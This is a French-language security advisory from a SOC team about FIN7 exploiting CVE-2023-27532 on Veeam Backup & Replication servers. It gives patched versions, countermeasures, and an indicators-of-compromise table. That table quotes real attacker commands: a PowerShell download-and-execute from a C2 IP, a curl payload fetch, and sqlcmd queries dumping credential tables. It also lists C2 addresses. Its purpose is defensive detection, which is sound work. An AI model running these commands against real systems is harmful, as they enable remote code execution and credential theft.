Accueil Nos publications Blog Cyberattaques en cours sur les serveurs Veeam Backup & Replication
Cybersécurité
22/05/2023 3 min

Cyberattaques en cours sur les serveurs Veeam Backup & Replication

Les serveurs Veeam Backup & Replication sont actuellement la cible d’attaques de cybercriminels, visant à exécuter des ransomwares pour chiffrer les données.

La vulnérabilité exploitée permet à un attaquant d’obtenir un accès au serveur de sauvegarde sans s’authentifier.

Cette vulnérabilité est due à une faille de sécurité CVE-2023-27532 avec un score de 7.5 publiée le 10 mars 2023, celle-ci permet d’avoir accès aux identifiants chiffrés de la base de données de configuration.

L’organisation Horizon3 a publié une démonstration et des détails techniques, rendant l’attaque plus accessible aux cybercriminels.
Depuis fin mars, le groupe cybercriminel russophone FIN7 a lancé des attaques contre les serveurs Veeam, en utilisant la faille de sécurité CVE-2023-27532.

Les serveurs compromis effectuent des actions suspectes telles que l’exécution et le téléchargement de scripts PowerShell depuis internet. Ces scripts permettent la reconnaissance et peuvent éventuellement aboutir à l’exécution d’un ransomware.

Contre-mesures

La vulnérabilité CVE-2023-27532 dispose déjà d’un correctif publié depuis le 7 mars 2023 par l’éditeur. Il s’agit de :

  • Veeam Backup & Replication 12 : build 12.0.0.1420 P20230223 (et versions supérieures)
  • Veeam Backup & Replication 11a : build 11.0.1.1261 P20230227 (et versions supérieures)


Il est donc crucial pour les entreprises de mettre à jour leur système et de prendre les mesures de sécurité nécessaires pour se protéger contre des attaques potentielles.

Le CSIRT-NEOSOFT recommande :

  • Analyser les serveurs Veeam en recherchant les indicateurs de compromissions
  • Appliquer régulièrement les mises à jour publiées par l’éditeur
  • Bloquer l’utilisation du port 9401 depuis les zones externes aux segments hébergeant les serveurs Veeam
  • Réviser les architectures permettant l’hébergement des hyperviseurs ESXi afin de respecter les bonnes pratiques de cloisonnements aussi bien système que réseau.

Indicateurs de compromissions

ValeurDescription
SHA18687b6b1508a93556d6e30d14e5c4ee9971f2d80POWERTRASH “icsnd16_64refl.ps1” sample
SHA1b621f8c5e9033718b4e9d47a2f0eccb9783f612aDUBLOADER “libcurl.dll” sample
SHA1e5480a47172e3f75dbf0384f4ca82c7b47910e0fPOWERTRASH “icbt11801_64refl.ps1” sample
IP217.12.206.176DICELOADER C2
IP162.248.225.115DICELOADER C2
IP45.136.199.128DICELOADER C2
IP91.149.243.181DICELOADER C2
IP91.199.147.152DICELOADER C2
IP95.217.49.123DICELOADER C2
IP77.75.230.112DICELOADER C2
IP194.87.148.41DICELOADER C2
Command linepowershell.exe -noni -nop -exe bypass -f \\XXX.XXX.XXX.XXX\ADMIN$\temp\nFcv5ke38cnE.ps1Lateral movement – POWERTRASH script execution
Command linepowershell.exe -noni -nop -exe bypass -f \\XXX.XXX.XXX.XXX\ADMIN$\temp\8MDg144UDiaz.ps1 \\XXX.XXX.XXX.XXX\ADMIN$\temp\tjRoG0vVn8OE.logLateral movement – Recon/Discovery script execution
Command lineC:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -Command “iex ((New-Object Net.WebClient).DownloadString(‘http://91.199.147.152/icsnd16_64refl.ps1’))”POWERTRASH download and execution
Command linepowershell.exe -ex bypass -noprof -nolog -nonint -f “C:\Windows\TEMP\934F.ps1”PowerShell execution command
Command linepowershell.exe -ex bypass -noprof -nolog -nonint -f “C:\Windows\TEMP\934F.ps1”PowerShell execution command
Command linecurl -O https://temp.sh/eJkTm/gup18.ps1Download POWERHOLD “gup18.ps1”
Command linewhoamiHands-on command
Command linesysteminfoHands-on command
Command lineping -n 1 -a XXX.XXX.XXX.XXXHands-on command
Command linewmic /user:”REDACTED” /password:”REDACTED” /node:”XXX.XXX.XXX.XXX” process list briefHands-on command
Command linenet use w: \\XXX.XXX.XXX.XXX\c$ /user:XXX.XXX.XXX.XXX\REDACTED REDACTEDHands-on command
Command linenet use w: /d /yHands-on command
Command lineWMIC LOGICALDISK GET Name,Size,FreeSpaceHands-on command
Command lineipconfig /allHands-on command
Command linetasklist /vHands-on command
Command linenetstat -aonHands-on command
Command linenslookup myip.opendns.com. resolver1.opendns.comHands-on command
Command linereg query “HKLM\software\veeam\veeam backup and replication”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup-2 SELECT top 100 * FROM Credentials;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM JobSourceRepositories;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM BJobs.VSphereInfo;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM SmbFileShares;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM VSphere.Workspaces;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM ObjectsInBackups;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM BackupRepositories;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM PhysicalHosts;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM Ssh_creds;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM HostNetwork;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM HostCreds;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM Backups;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM Locations;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM BJobs;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM PhysicalHostsServersLink;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM ObjectsInJobs;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM Hosts;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM JobVssCredsView;”Hands-on command
Command linesqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM HostsByJobs;”Hands-on command
sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q “use VeeamBackup SELECT top 100 * FROM HostCreds;”Hands-on command
Sources
  1. https://www.veeam.com/kb4424
  2. https://labs.withsecure.com/publications/fin7-target-veeam-servers

Rédigé par :

Collins Nenkam

Analyste SOC, Néosoft

Vous souhaitez en savoir plus ? Contactez-nous !